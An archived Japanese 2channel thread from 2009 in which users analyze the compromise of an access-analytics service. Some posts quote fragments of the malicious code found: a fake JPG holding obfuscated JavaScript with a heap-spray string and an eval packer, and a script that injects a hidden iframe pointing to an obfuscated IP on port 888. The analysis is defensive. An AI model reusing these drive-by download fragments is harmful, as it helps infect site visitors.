[過去ログ] 【アクセス解析】AccessAnalyzer.com Part5【XREA】 (1001レス)
上下前次1-新
抽出解除 レス栞
このスレッドは過去ログ倉庫に格納されています。
次スレ検索 歴削→次スレ 栞削→次スレ 過去ログメニュー
563(4): 2009/07/08(水)18:31 ID:??? AAS
改ざん?されたらしいほうのところを調査
gifトロイやらなんやら一杯はいってるね。自己解凍cabが偽装されてたりするし
でも大体は最新にアップデートしてればおkかな
でも、一番の問題は、これかな
http://1856317799:888/dir2/go.jpg
一見拡張子からjpgファイルっぽいけど、
> more go.jpg
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e
省5
568(2): 2009/07/08(水)19:13 ID:??? AAS
じわじわと何やられてんのかなーと調べ中。どうみてもあやしいjp.jsの中身を見てみる
>>563もそうだけど、大丈夫かは明確じゃないんでwindowsでは調べるのやらないほうがいいと思います。
とりあえず俺はFreeBSDなんでそれでやってます
>more jp.js
/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("J=")==-1)
{
var js = document.createElement('iframe');
js.src ="http:¥/¥/0x6EA52967:888/dir2/show.php";
width=0; height=0;
省17
658(2): 2009/07/09(木)00:21 ID:??? AAS
これって、どうやったらウイルスだってこととかターゲットとかがこの情報で解析できるの?
>>563の人とかアンチウイルスソフト使ってないみたいだし
深い意味はないけど、今後の勉強ってことで……
809: 2009/07/09(木)23:42 ID:??? AAS
2ちゃんねるだからっていうのは実際どうかとは思うよね
結局>>804の件なんて、もろ>>563とかでもう書いてあるし
他のスレでは7/6時点で、すでに検証とかで同じ答えでてるんだよな
まぁ、信用するかまでは自分で決めることだしね
938: 2009/07/11(土)02:53 ID:??? AAS
>>934
>自分で検証するのが安心できる一番の手段だよ
とはいうものの
過去ログの>>563とかでやっているような
jpgファイルの中身をテキストとして開いて、これはスクリプトでしかも有害だ! と判断できるというレベルを
みんなに要求することはできない
正解だったわけだが、俺にとっては今でもコードからは理解不能
ノートンとか有名どころのアナウンスで初めて信頼できた
上下前次1-新書関写板覧索設栞歴
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル アボンOFF
ぬこの手 ぬこTOP 0.134s